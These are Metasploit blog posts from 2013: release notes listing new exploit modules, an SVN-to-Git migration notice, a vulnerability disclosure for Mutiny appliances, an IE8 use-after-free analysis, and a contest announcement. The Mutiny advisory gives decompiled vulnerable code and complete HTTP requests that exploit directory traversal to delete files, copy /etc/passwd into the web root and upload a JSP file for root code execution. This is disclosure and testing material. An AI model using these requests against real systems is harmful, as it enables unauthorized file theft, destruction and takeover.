Metasploit 4.6.1 Released

This week's update bumps the patch version of Metasploit to 4.6.1 (for installed versions of Metasploit). The major change here is the ability to install Metasploit on Windows 8 and Windows Server 2012. That meant we had to fiddle with the installer and a few of Metasploit Pro's dependencies to get that all working correctly, and that led to skipping last week's release so we could be sure all the moving parts lined up correctly.

 

This release also fixes a few minor issues in Metasploit Pro that affected a handful of users -- you can read up on what exactly has changed in the release notes. As usual, it's a little bigger than you might expect from your typical update, given the changes in the installer code, so give it a couple extra minutes to download and do its update thing.

 

Intern Found!

If you've been watching this space, you'll know that we've been on the prowl for a summer intern. Welp, the search is over -- we've managed to pick up a well-qualified college student who has a strong background in both IT ops and exploit dev. If you have Pull Requests in the metasploit-framework backlog, or aging bugs in the Redmine Issue Tracker, then you should expect to meet him soon as he validates your pulls and bugs and gets your stuff back on track (or mercilessly axed).

 

Of course, this sort of backlog validation doesn't have to land on in paid intern's lap. If you're looking to beef up your resume, know a thing or two about IT security and Ruby, and are handy with VMware or Vagrant, you are more than welcome to throw in as well. We can always use extra validation inputs to our bugs and PR's. Even if you're not here in the Mazes of Metasploit, fixing bugs and getting your name attached to Metasploit commits is a pretty decent reference all by itself, paid or not.

 

SVN is Still Mostly Dead

This week we've locked up our SVN server at http://www.metasploit.com/svn with a pretty unguessable username and password. This is to discourage people from following the piles of pre-2011 documentation that's out there. The SVN lockdown is described at http://r-7.co/MSF-SVN in more detail, but the moral of the story is, don't even try to guess the password, and don't try to use your e-mail password or GitHub password or anything like that. The whole point of this new behavior is to merely transmit the instructions to move to Git in the WWW-Authenticate header.

 

New Modules

We've a fairly huge bucket full of exploits and auxiliary modules this week. Sixteen total, mostly around our 2013 theme of home access points and SAP installations. We're also shipping Juan's 1Day exploit for Mutiny appliances this week, as well as an exe dropper for SSH sessions from Spencer McIntyre and Brandon Knight.

 

Oh, and did you hear about the Linode compromise? Part of the incident centered around recent ColdFusion bugs. Now, I'm sure ColdFusion is a delightful language to work in and if you're CFM artiste, you probably have a ball every day working on your codebase. That said, it's not super popular language here in the 21st Century. This usually means that you're stuck with legacy-flavored security bugs, like the directory traversal vulnerability exercised by Hack The Planet and ported to Metasploit by Wei @_sinn3r Chen.

 

• D-Link DIR615h OS Command Injection by juan vazquez and Michael Messner exploits OSVDB-90174
• Linksys WRT160nv2 apply.cgi Remote Command Injection by juan vazquez and Michael Messner exploits OSVDB-90093
• Mutiny 5 Arbitrary File Upload by juan vazquez exploits CVE-2013-0136
• Kloxo Local Privilege Escalation by juan vazquez and HTP
• SAP Management Console OSExecute Payload Execution by juan vazquez and Chris John Riley
• SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution by nmonkee
• SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution by nmonkee
• SSH User Code Execution by Brandon Knight and Spencer McIntyre exploits CVE-1999-0502
• ERS Viewer 2011 ERS File Handling Buffer Overflow by juan vazquez and Parvez Anwar exploits CVE-2013-0726
• DLink DSL 320B Password Extractor by Michael Messner exploits OSVDB-93013
• Mutiny 5 Arbitrary File Read and Delete by juan vazquez exploits CVE-2013-0136
• SAP SOAP EPS_DELETE_FILE File Deletion by Alexey Sintsov and nmonkee exploits OSVDB-74780
• ColdFusion 'password.properties' Hash Extraction by sinn3r and HTP exploits OSVDB-93114
• CouchDB Enum Utility by espreto
• SAP CTC Service Verb Tampering User Management by Alexandr Polyakov and nmonkee
• SAP SMB Relay Abuse by Alexey Tyurin and nmonkee
• SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure by nmonkee

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

TL;DR: Please stop using SVN with

svn co https://www.metasploit.com/svn/framework3/trunk

and start using the GitHub repo with

git clone git://github.com/rapid7/metasploit-framework

 

As of today, a few of you may notice that an attempt to update Metasploit Framework over SVN (instead of git or msfupdate) results in an authentication request. If you try to SVN checkout on Windows, using TortoiseSVN, you will see a pop up much like this:

 

 

For command line people, if you try to 'svn co' or 'svn up' your checkout of Metasploit Framework you will read:

 

$ svn up Updating '.':
Authentication realm: <https://www.metasploit.com:443> =[ MSF must be updated via GitHub

or a more recent msfupdate. See http://r-7.co/MSF-SVN for more ]=

Password for 'yourname':

 

Please don't try any passwords you think you know. We've locked up SVN and we're using the authentication realm to communicate the correct update path to humans in a way readable by human eyeballs. The password prompt is incidental. If you've read this far, you might wonder why we're doing this.

 

On November 10, 2011, we moved our source control to GitHub, and we've been bugging people to use git instead of SVN ever since. However, the Internet exists in an eternal present tense. There are thousands and thousands documents, blog posts, books, and articles on 'Getting Started with Metasploit' in practically every human language spread all over the world, both on and offline, some of which we control, most of which we don't. If you don't believe me, just search for "svn co" metasploit.

Because of this, we're not ready to turn off SVN completely -- throwing a 404 error on an update will just generate more (than usual) complaints on Twitter, IRC, and mailing lists about 'svn co' and 'svn up' being broken. Those complaints are still happening today, so it's clear that some people are still stuck with way-out-of-date documentation. Hopefully, those folks will read the instruction in the HTTP authentication realm, since that's about the only way we can communicate with SVN-only clients.

 

If you are still on SVN, then converting to GitHub works like this:

 

1. Don't try to use a password; if by some miracle you happen to guess a correct one, your prize is that you get some messed up, out of date SVN-sourced code. (:
2. Delete your SVN checkout of Metasploit: rm -rf $HOME/metasploit (or the real path to your checkout).
3. Clone the latest from GitHub: git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit (or the path where you want the clone).
4. Go to your new Metasploit checkout, and run msfupdate: cd metasploit; ./msfupdate (this will get the bundle of Ruby gems together for you).

If you can't use the git:// URI handler, then use https:// instead. It's somewhat slower, but still a million times better than SVN. If bundler complains about gem dependencies, then check to make sure that you have a reasonable version of Ruby -- 1.9.3 is ideal. 1.8.x is out. 2.0.0 should be okay, but it's not vetted for prime time yet.

That's it. Everything will work as before -- your custom modules that you stashed in $HOME/.msf4/modules will be picked up, you will be gleefully tracking Metasploit's bleeding edge source branch, and now, your checkouts won't take hours and crash out on you.

 

If you use Metasploit Community, Metasploit Express, or Metasploit Pro, then basically none of this applies to you -- msfupdate was converted in Metasploit 4.5 to use use weekly updates, which means you're getting the benefit of both Rapid7 QA and community testing without bothering with git or SVN.

 

Below, you can find a smattering of documents and posts regarding msfupdate and tracking the Framework source, which will provide more detail on various aspects of the continuous state of Metasploit development. If your setup is not the simple case described here, you will probably find what you need in one of these documents:

 

Metasploit Development Environment · (metasploit-framework wiki)

Git while the gitting is good

Metasploit Moves from SVN to Git/GitHub

Update to the Metasploit Updates and msfupdate

Activating Metasploit to fix msfupdate: Start to Finish

Back in March we published an exploit module for Mutiny Remote Code Execution. Mutiny "is a self-contained appliance for monitoring network-attached devices such as servers, switches, routers and printers. It has been designed to be simple to use, being aimed at the person who is more interested in the actual data gathered rather than the science of gathering the data." (Source: Mutiny User Guide). That module abused CVE-2012-3001, a command injection issue in the frontend application which allowed any authenticated user, with access to the admin interface, to execute os commands with root privileges. While developing that exploit, we took a look at the last version of the Mutiny FrontEnd available at that time (5.0-1.07) and found others issues, grouped under CVE-2013-0136, which have the plus of being exploitable from any authenticated role.

 

Vulnerabilities Summary

 

The Mutiny Appliance provides a Web Frontend, where the users can configure the system and monitor the data collected by the appliance. The Frontend provides four access roles: “Super Admin”, “Administrator”, “Engineer” and “View only”. All the roles allow the user to access to the “Documents” section, where multiple weaknesses have been detected allowing

• To delete any file from the remote file system with root privileges.
• To copy and move files in the remote file system with root privileges, allowing also to download/retrieve these files.
• To upload arbitrary files to the remote file system and ultimately execute arbitrary code with root privileges.

 

Disclosure Timeline

 

DateDescription2013-03-08Initial discovery by Juan Vazquez, Metasploit Researcher2013-03-09Draft advisory and Metasploit module written2013-03-11Initial disclosure to the vendor, Mutiny Technology2013-03-12

Follow-up with vendor

2013-03-27Disclosure to CERT/CC2013-05-14Version 5.0-1.11 tested and not vulnerable to the disclosed exploitation (1)2013-05-15Public Disclosure2013-05-15Metasploit exploit module published

 

(1) Prior to public disclosure the last version available has been tested and the disclosed exploit techniques don't work anymore. The tested version has been "5.0-1.11 (EAGLe) - (02-05-13)". Since the vendor didn't warn us about the patch neither asked us to review the patch we can't assure the current patch is 100% confident and secure, neither have details about revisions between 5.0.1-07 and 5.0.1-11 which could be vulnerable. We encourage you to use the current Metasploit modules in order to test your Mutiny installation for the disclosed vulnerabilities.

 

Technical Analysis

 

The Web Frontend of Mutiny is provided in part by a Java Web Application. This frontend provides a "Documents" section for authenticated users for any role:

 

The Documents functions are in part provided by a servlet named "EditDocument". This servlets provides several "Documents" functions such as upload, copy, move and delete documents:

 

protected void doPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)   throws ServletException, IOException   .   .   s = httpservletrequest.getParameter("operation");   if(ServletFileUpload.isMultipartContent(httpservletrequest))   s = "UPLOAD";   .   .   .   if(!s.equals("NEW")) goto _L2; else goto _L1   .   .   .   if(!s.equals("RENAME")) goto _L5; else goto _L4   .   .   .   if(!s.equals("DELETE")) goto _L7; else goto _L6   .   .   .   if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8

 

• The UPLOAD operation can be abused via a Directory Traversal vulnerability in the “uploadPath” parameter  to upload arbitrary file and contents to the remote filesystem with root privileges:

 

if(s.equals("UPLOAD")) {   ServletFileUpload servletfileupload = new ServletFileUpload(new DiskFileItemFactory());   List list = null;   try   {   list = servletfileupload.parseRequest(httpservletrequest);   }   catch(FileUploadException fileuploadexception)   {   fileuploadexception.printStackTrace();   }   String s6 = null;   FileItem fileitem = null;   Iterator iterator = list.iterator();   do   {   if(!iterator.hasNext())   break;   FileItem fileitem1 = (FileItem)iterator.next();   if(fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadPath"))   s6 = fileitem1.getString(); // User controlled   else   if(!fileitem1.isFormField() && fileitem1.getFieldName().equals("uploadFile"))   fileitem = fileitem1; // User controlled   } while(true);   if(s6.length() == 0)   {   System.out.println("Error: uploadPath not set.");   s6 = "/documents";   }   if(fileitem == null)   {   System.out.println("Error: uploadFile not set.");   } else   {   File file5 = new File(DocumentUtils.root, s6); // Directory Traversal   File file7 = new File(file5, fileitem.getName());   file7.getParentFile().mkdirs();   file7 = DocumentUtils.getUniqueFile(file7, false);   file7.createNewFile();   try   {   fileitem.write(file7); // Write file   if(file7.exists() && file7.length() == fileitem.getSize())   flag = true;   if(debug)   System.out.println((new StringBuilder()).append(s).append(": ").append(file7.getPath()).toString());   }   catch(Exception exception)   {   exception.printStackTrace();   }   } }

 

• The DELETE operation is also affected by a directory traversal vulnerability in the “paths[]” parameter, which allows to delete arbitrary files with root privileges:

 

_L5:         if(!s.equals("DELETE")) goto _L7; else goto _L6 _L6:         String as1[] = httpservletrequest.getParameterValues("paths[]"); // User controlled         String as2[] = as1;         int j = as2.length;         for(int k = 0; k < j; k++)         {             String s7 = as2[k];             File file6 = new File(DocumentUtils.root, s7); // Directory Traversal             if(!isValid(file6))                 return;             if(file6.isDirectory())                 FileUtils.deleteDirectory(file6); // Delete directory             else                 flag = file6.delete(); // Delete file             if(debug)                 System.out.println((new StringBuilder()).append("DELETE: ").append(file6.getPath()).toString());         }

 

• Also the CUT and COPY operation is also affected by directory traversal vulnerabilities in the “paths[]” and “newPath” parameters, which allows to copy and move files around the remote file system with root privileges:

 

        if(!s.equals("CUT") && !s.equals("COPY")) goto _L9; else goto _L8 _L8:         File file2;         String as3[];         String s4 = httpservletrequest.getParameter("newPath");         file2 = new File(DocumentUtils.root, s4); // Directory Traversal in newPath         as3 = httpservletrequest.getParameterValues("paths[]");         if(as3 == null) goto _L3; else goto _L10 _L10:         String as4[];         int l;         int i1;         as4 = as3;         l = as4.length;         i1 = 0; _L11:         File file8;         File file9;         FileInputStream fileinputstream;         FileOutputStream fileoutputstream;         if(i1 >= l)             break; /* Loop/switch isn't completed */         String s8 = as4[i1];         file8 = new File(DocumentUtils.root, s8); // Directory traversal in paths[]         if(!isValid(file8))             return;         file9 = new File(file2, file8.getName()); // Directory traversal in newPath         file9 = DocumentUtils.getUniqueFile(file9, file8.isDirectory());         if(debug)             System.out.println((new StringBuilder()).append(s).append(": ").append(file9.getPath()).toString());         file9.getParentFile().mkdirs();         if(s.equals("CUT"))         {             flag = file8.renameTo(file9); // CUT operation affected by directory traversals             break MISSING_BLOCK_LABEL_881;         }         if(!s.equals("COPY"))             break MISSING_BLOCK_LABEL_881;         if(!file9.exists())             file9.createNewFile();         fileinputstream = null;         fileoutputstream = null;         fileinputstream = new FileInputStream(file8); // COPY operationaffected by directory traversals         fileoutputstream = new FileOutputStream(file9);         byte abyte0[] = new byte[4096];         int j1;         while((j1 = fileinputstream.read(abyte0)) > 0)             fileoutputstream.write(abyte0, 0, j1);         flag = true;         fileinputstream.close();         fileoutputstream.close();         break MISSING_BLOCK_LABEL_881;         Exception exception1;         exception1;         System.err.println(exception1.getMessage());         fileinputstream.close();         fileoutputstream.close();         break MISSING_BLOCK_LABEL_881;         Exception exception2;         exception2;         fileinputstream.close();         fileoutputstream.close();         throw exception2;         i1++;         if(true) goto _L11; else goto _L3

 

Exploitation

 

After examining the “doPost()” function from the “EditDocument” servlet,  requests to abuse these functions have been built.

 

DELETE operation

 

The next request allows deleting an arbitrary file from the filesystem:

 

POST /interface/EditDocument HTTP/1.1

Host: 192.168.1.177

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17

Content-Length: 76

Accept: */*

Origin: http://192.168.1.177

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded

Referer: http://192.168.1.177/interface/documents.jsp

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D

Connection: keep-alive

Proxy-Connection: keep-alive

 

 

 

operation=DELETE&paths%5B%5D=../../../../test.msf

 

In this case the “/test.msf” will be deleted in the remote file system. The 4 level traversal is due to “DocumentUtils.root” by default pointing to “/var/MUTINY/upload/documents” in the Linux based appliance.

 

The response to the request informs if the file deletion has been successful:

 

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

X-UA-Compatible: IE=10

Content-Type: application/json;charset=UTF-8

Content-Length: 16

Date: Fri, 08 Mar 2013 02:16:18 GMT

 

 

{"success":true}

 

COPY operation

 

The copy operation allows copying arbitrary files in the remote file system with root privileges. By copying arbitrary files to the default web root in the appliance it’s possible to retrieve arbitrary files.

 

The next request allows copying the “/etc/passwd” file to the web root for mobile devices, by default located at “/usr/jakarta/tomcat/webapps/ROOT/m” in the Mutiny Linux based appliance:

 

POST /interface/EditDocument HTTP/1.1

Host: 192.168.1.177

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17

Content-Length: 111

Accept: */*

Origin: http://192.168.1.177

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded

Referer: http://192.168.1.177/interface/documents.jsp

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Cookie: JSESSIONID=14CE95F1ED56321B4B226DF669D691C0; JSESSIONIDSSO=FA98603965548C3FB1F67BC5121A75DC

Connection: keep-alive

Proxy-Connection: keep-alive

 

 

 

operation=COPY&paths%5B%5D=../../../../etc/passwd%00.txt&newPath=../../../../usr/jakarta/tomcat/webapps/ROOT/m/

 

The response to the request informs if the file deletion has been successful:

 

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

X-UA-Compatible: IE=10

Content-Type: application/json;charset=UTF-8

Content-Length: 16

Date: Fri, 08 Mar 2013 04:11:17 GMT

 

 

 

{"success":true}

 

By accessing to http://appliance/m/passwd is possible to retrieve the remote file:

 

UPLOAD operation

 

The upload operation allows uploading an arbitrary file to the file system with root privileges. By uploading a JSP file to the “/usr/jakarta/tomcat/webapps/ROOT/m” default location, arbitrary Java can be executed with root privileges by later invoking the JSP file via the web interface. The next request allows uploading JSP code to the "/usr/jakarta/tomcat/webapps/ROOT/m/msf.jsp” location:

 

POST /interface/EditDocument HTTP/1.1

Host: 192.168.1.177

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17

Content-Length: 491

Accept: */*

Origin: http://192.168.1.177

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPxNcR2XfK8d5gMeU

Referer: http://192.168.1.177/interface/documents.jsp

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Cookie: JSESSIONID=611F495538F214B351A860D32273DB89; JSESSIONIDSSO=EF00467D61F67EA2CE86010762914E4D

Connection: keep-alive

Proxy-Connection: keep-alive

 

 

 

------WebKitFormBoundaryPxNcR2XfK8d5gMeU

Content-Disposition: form-data; name="uploadFile"; filename="msf.jsp"

Content-Type: application/octet-stream

 

 

 

<html>

        <head><title>Metasploit Test Page</title></head>

        <body>

                <font size="10"><%="Metasploit Test" %></font>

        </body>

</html>

 

 

------WebKitFormBoundaryPxNcR2XfK8d5gMeU

Content-Disposition: form-data; name="uploadPath"

 

 

 

../../../../usr/jakarta/tomcat/webapps/ROOT/m

------WebKitFormBoundaryPxNcR2XfK8d5gMeU—

 

The response to the request informs if the file upload has been successful:

 

By accessing to http://appliance/m/msf.jsp is possible to execute the uploaded JSP code:

 

 

Metasploit modules

 

In order to assist vulnerability testing two modules for the Metasploit framework have been developed.

 

mutiny_frontend_read_delete

 

The “mutiny_frontend_read_delete” is an auxiliary module which abuses the DELETE and COPY operations to retrieve or delete arbitrary files from the remote system:

 

• Reading /etc/passwd

 

 

• Deleting remote files

 

 

mutiny_frontend_upload

 

The "mutiny_frontend_upload" is an exploit module which abuses the UPLOAD operation to upload an arbitrary JSP code and an arbitrary payload embedded in an ELF file. The last one is executed through the invocation of the JSP stager:

 

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Recently, the U.S. Department of Labor website was compromised and had been serving malicious code, capable of detecting and disabling some antivirus products such as Avira, F-Secure, Kaspersky, AVG, Sophos, etc.  It would also attack Internet Explorer 8 users with an 0-day exploit.  The Metasploit vulnerability research community was particularly interested in the exploit part, therefore that's what we'd like to talk about in this blog. Understanding how the evolving browser security landscape operates is key to formulating defense strategies, after all.

 

First off, according to Microsoft's advisory, only Internet Explorer 8 is vulnerable to this exploit, and we verified that with a fully patched Windows 7 with IE8.  If you are looking for an excuse to upgrade to something more recent, the following image demonstrates IE8's weakness:

Some people say this is a CVE-2012-4792 (a patched vulnerability), we beg to differ.  CVE-2012-4792 is a cbutton use-after-free, but the DoL exploit doesn't use this object at all (Exodus has an excellent writeup about that vulnerability).  Instead, a mshtml!CGenericElement::`vtable' is created while appending a datalist element:

 

Allocating 0x4C bytes from InsertElementInternal: 0x0563cfb0 ... 0:008> !heap -p -a poi(0x0563cfb0)     address 06a99fc8 found in     _DPH_HEAP_ROOT @ 151000     in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)                                  5087390:          6a99fc8               38 -          6a99000             2000           mshtml!CGenericElement::`vftable'     7c918f01 ntdll!RtlAllocateHeap+0x00000e64     635db42e mshtml!CGenericElement::CreateElement+0x00000018     635a67f5 mshtml!CreateElement+0x00000043     637917c0 mshtml!CMarkup::CreateElement+0x000002de     63791929 mshtml!CDocument::CreateElementHelper+0x00000052     637918a2 mshtml!CDocument::createElement+0x00000021     635d3820 mshtml!Method_IDispatchpp_BSTR+0x000000d1     636430c9 mshtml!CBase::ContextInvokeEx+0x000005d1     63643595 mshtml!CBase::InvokeEx+0x00000025     63643832 mshtml!DispatchInvokeCollection+0x0000014b     635e1cdc mshtml!CDocument::InvokeEx+0x000000f1     63642f30 mshtml!CBase::VersionedInvokeEx+0x00000020     63642eec mshtml!PlainInvokeEx+0x000000ea     633a6d37 jscript!IDispatchExInvokeEx2+0x000000f8     633a6c75 jscript!IDispatchExInvokeEx+0x0000006a     633a9cfe jscript!InvokeDispatchEx+0x00000098

 

And freed during garbage collection:

0:008> !heap -p -a poi(0x0563cfb0)     address 06a99fc8 found in     _DPH_HEAP_ROOT @ 151000     in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)                                     5087390:          6a99000             2000     7c927553 ntdll!RtlFreeHeap+0x000000f9     636b52c6 mshtml!CGenericElement::`vector deleting destructor'+0x0000003d     63628a50 mshtml!CBase::SubRelease+0x00000022     63640d1b mshtml!CElement::PrivateRelease+0x00000029     6363d0ae mshtml!PlainRelease+0x00000025     63663c03 mshtml!PlainTrackerRelease+0x00000014     633a10b4 jscript!VAR::Clear+0x0000005c     6339fb4a jscript!GcContext::Reclaim+0x000000ab     6339fd33 jscript!GcContext::CollectCore+0x00000113     63405594 jscript!JsCollectGarbage+0x0000001d     633a92f7 jscript!NameTbl::InvokeInternal+0x00000137     633a6650 jscript!VAR::InvokeByDispID+0x0000017c     633a9c0b jscript!CScriptRuntime::Run+0x00002989     633a5ab0 jscript!ScrFncObj::CallWithFrameOnStack+0x000000ff     633a59f7 jscript!ScrFncObj::Call+0x0000008f     633a5743 jscript!CSession::Execute+0x00000175

 

Even though the CGenericElement vftable is freed, the reference is stil kept:

0:008> dc 0x0563cfb0; .echo; dc poi(0x0563cfb0) 0563cfb0  06a99fc8 00000000 ffff0075 ffffffff  ........u....... 0563cfc0  00000071 00000000 00000000 00000000  q............... 0563cfd0  00000000 0563cfd8 00000152 00000001  ......c.R....... 0563cfe0  00000000 00000000 0563cfc0 00000000  ..........c..... 0563cff0  00000010 00000000 00000000 d0d0d0d0  ................ 0563d000  ???????? ???????? ???????? ????????  ???????????????? 0563d010  ???????? ???????? ???????? ????????  ???????????????? 0563d020  ???????? ???????? ???????? ????????  ???????????????? 06a99fc8  ???????? ???????? ???????? ????????  ???????????????? 06a99fd8  ???????? ???????? ???????? ????????  ???????????????? 06a99fe8  ???????? ???????? ???????? ????????  ???????????????? 06a99ff8  ???????? ???????? ???????? ????????  ???????????????? 06a9a008  ???????? ???????? ???????? ????????  ???????????????? 06a9a018  ???????? ???????? ???????? ????????  ???????????????? 06a9a028  ???????? ???????? ???????? ????????  ???????????????? 06a9a038  ???????? ???????? ???????? ????????  ????????????????

 

And of course, this invalid reference ends up with a crash when used by mshtml!CElement::Doc():

0:008> g (5f4.2c0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=63aae200 ebx=0563cfb0 ecx=06a99fc8 edx=00000000 esi=037cf0b8 edi=00000000 eip=6363fcc4 esp=037cf08c ebp=037cf0a4 iopl=0         nv up ei pl zr na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246 mshtml!CElement::Doc: 6363fcc4 8b01            mov     eax,dword ptr [ecx]  ds:0023:06a99fc8=????????

 

As of now, we are not aware of any patch from Microsoft specifically for IE8, but we will be updating this blog as soon as we hear something.  If you're a current IE8 user, then please consider the following workarounds:

• For newer Windows, upgrade to Internet Explorer 9 or 10.
• For Windows XP users, please use other browsers such as Google Chrome or Mozilla Firefox.
• If for some reason you must use Internet Explorer 8, please use EMET.  Or, you can also try setting IE's security zone to High, and customize your Active Scripting settings.

 

Note that while Microsoft's advisory also suggests setting IE8's Internet security zones to 'High' for ActiveX controls, this, by itself, will not mitigate -- the exploitation technique used here does not leverage ActiveX controls at all. So, while that is generally good advice, it will not help in this case.

 

If you'd like to try out this Metasploit module to better validate your defenses, please feel free to download Metasploit here.  If you already have Metasploit Framework, you may just use the msfupdate utility to receive this module.  For Metasploit Pro users, you will see this module in the upcoming update.

 

Special thanks to: EMH

 

 

TimelineMay 3rd - Microsoft advisory 2847140, no patch yet.May 5th - Metasploit releases ie_cgenericelement_uaf exploitMay 8th - Microsoft releases "fix-it"May 14th - Microsoft releases MS13-038 patch

When I wrote up the Metasploit Hits 1000 Exploits post back in December, I had to perform a little open source forensic work to get something resembling an accurate history of the Metasploit project -- after all, it's difficult for me to remember a time on the Internet without Metasploit. I traced the first mention of 1.0 back to this mailing list post in 2003. You know what that means, right? This year marks the 10th year of the Metasploit Framework!

 

One of the ways we're marking this anniversary is with something very much in keeping with our history. You may remember our T-shirt design contest back in 2011, won by Danny Chrastil and his elegant hexified Metasploit logo (with a cowsay back), and our Metasploit tattoo design competition. We had such a good experience with these contests that we're commemorating this auspicious anniversary with a new Metasploit laptop decal design contest... starting today!

 

The winning design will be selected on Friday, May 31, 2013.

 

You can enter by posting your design to this 99Designs project and tweeting a link to your design with the hashtag #metasploitdecal.

 

Once all designs are in, we'll select the finalists and ask the Metasploit Community to select the final winner.

 

Like last time, the winner will have the satisfaction of having their design plastered on hacker's gear (yes, we're doing laptop decals!). In addition, the triumphant designer will win a grand payout on 99Designs for permission to use the work.

 

So, think about what you want to see on your laptop, public or private property that you have gain prior, written authorization to tag, and maybe even tattooed on some Rapid7 employee's person, and tweet your designs!

 

Happy Birthday Metasploit!

Attacking WordPress Plugins

Someone once described PHP as a "web API for remote code execution," and it's true that PHP is definitely web programming without guardrails. This week's security news was dominated by a RCE vulnerability in a pair of wildly popular WordPress plugins, W3 Total Cache and WP Super Cache, which are written in (wait for it) PHP. Regular Metasploit contributors HD Moore, Juan Vazquez, and FireFart leaped into action to write up a Metasploit module to achieve code execution on WordPress-powered sites that use these plugins.

 

What does this mean for network defenders and auditors? Well, for many small businesses, and some larger ones, a WordPress-powered site may be the one touch point that these business have with their customers. Suffering a website defacement can damage these business's brands and reputations. However, there's no law that says a PHP-based attack must result in a website defacement. A persistent attacker can leverage this vulnerability to perform all sorts of mischief, such as compromising back-end database credentials, dumping stored user password hashes, or combining this attack with a local privilege escalation exploit to gain control over the entire server. This can all be done without leaving obvious signs of compromise on the website proper.

 

So, if you are responsible for a WordPress site, it would behoove you to use Metasploit to determine if you are, in fact, vulnerable to these kinds of exploits, and to see for yourself how far an exploit can go.

 

Mimikatz

This update also comes with a shiny new way to steal credentials. The pentesters in the audience are no doubt aware of a tool called mimikatz that has been around for a while, but which invariably causes AV to lose its mind and ruin your day. Mimikatz, written by @gentilkiwi, is a tool that rummages through lsass.exe's memory looking for credential structures of various kinds. In most cases, it can grab cleartext passwords.

 

Now, thanks to @gentilkiwi's change to a compatible license (Creative-Commons-Attribution) and the integration efforts of Meatballs, Meterpreter can use this valuable technique completely in memory, saving you the headache of having to figure out how to run a packer.

 

Still Seeking Interns

I mentioned last week that the Metasploit Framework team is seeking an intern to help out over the summer in our secret underground exploit lair here in Austin. We've already gotten a number of good leads, so this week is about the last chance to get on board with our internship program. If you are passionate about open source security and want to spend your summer helping advance the state of the art with a team of world-class security professionals, check out the job requirements at http://r-7.co/MSF-INTERN and we'll see if we can't set up an interview in the next few days.

 

New Modules

This week, we have eight new modules, including the WordPress Total Cache exploit, Joe Vennix's Safari-based universal XSS module, Ben Campbell's implementation of waraxe's phpMyAdmin RCE exploit, a pair of SAP modules from Andras Kabai based on the research by Dmitry Chastuhin.

• GroundWork monarch_scan.cgi OS Command Injection by juan vazquez and Johannes Greil exploits OSVDB-91051
• phpMyAdmin Authenticated Remote Code Execution via preg_replace() by Ben Campbell and Janek "waraxe" Vind exploits CVE-2013-3238
• Wordpress W3 Total Cache PHP Code Execution by juan vazquez, hdm, Christian Mehlmauer, and Unknown exploits OSVDB-92652
• SAP ConfigServlet Remote Code Execution by Andras Kabai and Dmitry Chastuhin exploits OSVDB-92704
• SAP ConfigServlet OS Command Execution by Andras Kabai and Dmitry Chastuhin exploits OSVDB-92704
• Apple Safari .webarchive File Format UXSS by joev

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

First of all, a big thank you to all of you who participated in our OWASP Top 10 and Web App Scanning webcast last week. (If you missed it, you can view a recording here.) Because of an issue with the webcast platform, I wasn't able to see all of the audience questions while we were online. However, my colleagues were able to recover the unanswered questions, so I created questions and answers for them in the Metasploit discussion forum. Here they are:

 

• Which Metasploit editions include the web app testing feature?
• For penetration testing, is it more cost-effective to hire a consultant or buy software?
• How does Metasploit integrate with Nexpose?
• Can Metasploit Pro just be used for scanning?
• Can you you automate Metasploit?
• Can you you automate Metasploit?
• In what language is Metasploit Pro developed?
• In what language is Metasploit Pro developed?
• How much is Metasploit Pro?
• Will there be a cloud version of Metasploit?
• Should I scan websites with Metasploit or Nexpose?
• What type of cross-site scripting vulnerabilities does Metasploit Pro detect?

 

If your question wasn't answered, please feel free to post it as a discussion in the Metasploit section. If you have a confidential question, please email info@rapid7.com. 

This depends on what you're trying to achieve:

 

Use Metasploit if you:

• Are looking for a pentesting tool to exploit vulnerabilities in web applications
• Have other penetration testing or phishing simulation needs

 

Use Nexpose if you:

• Are looking to identify vulnerabilities in web applications
• Are looking to do regular, automated scans
• Want to run a general vulnerability management program

 

---

This was an audience question from the webcast "OWASP Top 10 2013: What’s New - and How to Audit Your Web Apps". You can view a recorded version here: OWASP Top 10 and Web App Scanning Webcast | Rapid7.

While Rapid7 is currently not planning to create a SaaS version of Metasploit, you can run Metasploit in the cloud. For more information, please view this blog post:

